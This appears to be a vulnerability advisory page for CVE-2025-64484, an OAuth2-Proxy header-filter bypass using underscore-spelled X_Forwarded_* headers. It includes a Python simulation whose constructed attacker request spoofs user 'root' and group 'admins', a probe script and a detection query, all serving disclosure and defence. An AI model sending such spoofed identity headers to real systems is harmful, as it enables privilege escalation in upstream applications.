CVE-2025-64484
📋 TL;DR
An attacker who already holds a valid OAuth2-Proxy session can bypass OAuth2-Proxy's filtering of client-supplied X-Forwarded-* headers by sending the same names with underscores instead of dashes (X_Forwarded_User instead of X-Forwarded-User). OAuth2-Proxy strips only the dash spelling, but CGI-style environments map both spellings to the same variable (HTTP_X_FORWARDED_USER), so an upstream that trusts those variables as proxy-set identity sees the attacker's values. This can lead to privilege escalation in the upstream application. Only deployments with OAuth2-Proxy in front of applications using WSGI-based frameworks or PHP are affected.
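The following is an added example (not code from OAuth2-Proxy or the advisory) that models the two halves of the problem: the CGI/WSGI rule that turns every request header into an HTTP_* variable, and a simplified identity-aware proxy that strips client X-Forwarded-* headers before adding its own. The attacker request, the session user "alice" and the upstream's trust in HTTP_X_FORWARDED_GROUPS are constructed for the demonstration. The dash-only filter stands in for the pre-7.13.0 behaviour; the normalized filter is one way to close the gap.

```python
"""Why X_Forwarded_* slips past a dash-only X-Forwarded-* filter (added example)."""


def wsgi_environ_key(header_name: str) -> str:
    """CGI/WSGI mapping as done by wsgiref, gunicorn and PHP's $_SERVER:
    upper-case, '-' becomes '_', prefix HTTP_. Both 'X-Forwarded-User' and
    'X_Forwarded_User' collapse to the same key."""
    return "HTTP_" + header_name.upper().replace("-", "_")


def build_environ(headers):
    """Turn (name, value) pairs into a WSGI-style environ.
    Repeated keys are comma-joined, as wsgiref does."""
    env = {}
    for name, value in headers:
        key = wsgi_environ_key(name)
        env[key] = f"{env[key]},{value}" if key in env else value
    return env


def is_forwarded_dash_only(name: str) -> bool:
    """Filter that only recognises the dash spelling (the bypassable check)."""
    return name.lower().startswith("x-forwarded-")


def is_forwarded_normalized(name: str) -> bool:
    """Filter that compares after the same normalisation the upstream applies."""
    return name.replace("_", "-").lower().startswith("x-forwarded-")


def proxy_forward(client_headers, session_user, strip):
    """Simplified identity-aware proxy: drop client headers matched by `strip`,
    then append the trusted identity header from the authenticated session."""
    kept = [(n, v) for n, v in client_headers if not strip(n)]
    kept.append(("X-Forwarded-User", session_user))
    return kept


# Constructed attacker request: a valid session (user "alice") plus spoofed identity headers.
ATTACKER_HEADERS = [
    ("Host", "app.example.test"),
    ("Cookie", "_oauth2_proxy=<session>"),
    ("X-Forwarded-User", "root"),       # stripped by both filters
    ("X_Forwarded_User", "root"),       # only the normalized filter catches this
    ("X_Forwarded_Groups", "admins"),   # upstream never receives a trusted version of this
]


def upstream_view(environ):
    """Upstream that trusts HTTP_X_FORWARDED_* as set by the proxy (constructed)."""
    user = environ.get("HTTP_X_FORWARDED_USER", "")
    groups = [g for g in environ.get("HTTP_X_FORWARDED_GROUPS", "").split(",") if g]
    return {"user": user, "is_admin": "admins" in groups}


def run(strip):
    """What the upstream sees for ATTACKER_HEADERS under a given proxy filter."""
    return upstream_view(build_environ(proxy_forward(ATTACKER_HEADERS, "alice", strip)))


if __name__ == "__main__":
    print("dash-only filter  :", run(is_forwarded_dash_only))   # user polluted, is_admin True
    print("normalized filter :", run(is_forwarded_normalized))  # user alice, is_admin False
```

Two things to note from the output: where the proxy does set a trusted header (X-Forwarded-User), the attacker's value is merged into it rather than replaced ("root,alice"); where the proxy sets nothing (groups), the attacker controls the variable outright.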
💻 Affected Systems
- oauth2-proxy
⚠️ Manual Verification Required
This CVE entry carries no version ranges in our database, so automatic vulnerability detection cannot determine whether your system is affected.
Why? The NVD record does not specify which versions are vulnerable; compare your installed version against the fix version given under Official Fix below.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers gain administrative privileges in upstream applications, potentially leading to complete system compromise.
Likely Case
Privilege escalation allowing access to restricted functionality or data in the upstream application.
If Mitigated
No impact if upstream applications don't normalize underscores to dashes or have additional security controls.
🎯 Exploit Status
Exploitation requires authenticated access and knowledge of the upstream application's header processing behavior.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 7.13.0
Vendor Advisory: https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-vjrc-mh2v-45x6
Restart Required: Yes
Instructions:
1. Update OAuth2-Proxy to version 7.13.0 or later.
2. Restart the OAuth2-Proxy service.
3. Verify the new version is running.
🔧 Temporary Workarounds
Drop underscore-named headers before they reach the upstream
The CGI/WSGI mapping used by Django, Flask, FastAPI and PHP collapses X-Forwarded-User and X_Forwarded_User into the same HTTP_X_FORWARDED_USER variable, so the application itself cannot tell the two spellings apart. Instead, strip request headers whose names contain underscores at a proxy layer in front of the upstream; nginx already drops them unless underscores_in_headers is switched on.
🧯 If You Can't Patch
- Header validation inside the upstream application is of limited use here: by the time WSGI or PHP code runs, the underscore and dash spellings have already been merged into one HTTP_X_FORWARDED_* variable. Where possible, stop treating X-Forwarded-* as proxy-verified identity and take the user identity from a channel the client cannot write to.
- Deploy a WAF or an additional reverse proxy layer, in front of OAuth2-Proxy or between it and the upstream, that drops request headers whose names contain underscores; nginx does this by default (underscores_in_headers off).
🔍 How to Verify
Check if Vulnerable:
Check the OAuth2-Proxy version, and whether the upstream application runs under a WSGI server or PHP (i.e. whether it normalizes header names so that both X-Forwarded-* and X_Forwarded_* become HTTP_X_FORWARDED_*).
Check Version:
oauth2-proxy --version
Verify Fix Applied:
Confirm the OAuth2-Proxy version is 7.13.0 or later, then test end to end: send a request carrying X_Forwarded_User (underscore) through OAuth2-Proxy to an upstream that echoes the raw headers it received, and confirm the client-supplied value does not arrive.
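The following is an added probe (not OAuth2-Proxy's own test code) for that end-to-end check. It starts a small echo upstream that reports the raw header names and values it received, and a client that sends the dash form plus underscore variants, each carrying a sentinel value. Header names other than X-Forwarded-User, the sentinel string and the echo server are constructed for this example. Sent straight to the echo server with no proxy in between, every probe header arrives; that is the baseline the script prints.

```python
"""Probe whether a proxy passes X_Forwarded_* (underscore) headers to its upstream (added example)."""
import http.client
import json
import socketserver
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

PROBE_SENTINEL = "cve-2025-64484-probe"  # constructed marker we look for on the far side
PROBE_HEADERS = {                         # constructed: dash form plus underscore variants
    "X-Forwarded-User": PROBE_SENTINEL,
    "X_Forwarded_User": PROBE_SENTINEL,
    "X_Forwarded_Email": PROBE_SENTINEL,
    "X_Forwarded_Groups": PROBE_SENTINEL,
}


class EchoHeadersHandler(BaseHTTPRequestHandler):
    """Echo upstream: replies with the raw header names and values it received.
    http.server keeps raw names; a WSGI app could not tell the spellings apart."""

    def do_GET(self):
        body = json.dumps({"received": list(self.headers.items())}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):  # keep the probe output clean
        pass


class EchoServer(HTTPServer):
    def server_bind(self):
        # Bind without HTTPServer's reverse-DNS lookup of the bind address.
        socketserver.TCPServer.server_bind(self)
        self.server_name, self.server_port = "echo", self.server_address[1]


def start_echo_upstream(port=0):
    """Start the echo upstream on 127.0.0.1 (port 0 picks a free port)."""
    server = EchoServer(("127.0.0.1", port), EchoHeadersHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe(host, port, path="/", cookie=None):
    """Send PROBE_HEADERS to host:port (optionally with a session cookie) and
    return the (name, value) pairs the echo upstream reported."""
    headers = dict(PROBE_HEADERS)
    if cookie:
        headers["Cookie"] = cookie
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path, headers=headers)
        resp = conn.getresponse()
        return [tuple(pair) for pair in json.loads(resp.read())["received"]]
    finally:
        conn.close()


def leaked_probe_headers(received):
    """Header names, as the upstream saw them, whose value is our sentinel:
    client-controlled identity headers the proxy let through."""
    return sorted(name for name, value in received if value == PROBE_SENTINEL)


if __name__ == "__main__":
    upstream = start_echo_upstream()
    print(f"echo upstream listening on 127.0.0.1:{upstream.server_port}")
    # Baseline with no proxy in the path: all four probe headers arrive.
    print("leaked (no proxy):", leaked_probe_headers(probe("127.0.0.1", upstream.server_port)))
    upstream.shutdown()
```

To test a deployment, run the echo upstream on a fixed port, configure the OAuth2-Proxy instance under test to use it as its upstream, and call `probe()` against OAuth2-Proxy with a valid session cookie. A vulnerable proxy reports the underscore names as leaked; a fixed one should report an empty list for these names.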
📡 Detection & Monitoring
Log Indicators:
- Unusual X-Forwarded-* headers with underscores in application logs
- Privilege escalation attempts in upstream application logs
Network Indicators:
- HTTP requests containing X_Forwarded_* headers (with underscores) passing through OAuth2-Proxy
SIEM Query:
source="oauth2-proxy" AND (http_header="X_Forwarded_*" OR http_header="*_Forwarded_*")
Note: OAuth2-Proxy's default request log format does not record arbitrary request headers, so this query assumes header names are ingested from a front-end proxy access log or a custom log format that includes them.
🔗 References
- https://datatracker.ietf.org/doc/html/rfc2616#section-4.2
- https://datatracker.ietf.org/doc/html/rfc822#section-3.2
- https://github.com/oauth2-proxy/oauth2-proxy/security/advisories/GHSA-vjrc-mh2v-45x6
- https://github.security.telekom.com/2020/05/smuggling-http-headers-through-reverse-proxies.html
- https://www.uptimia.com/questions/why-are-http-headers-with-underscores-dropped-by-nginx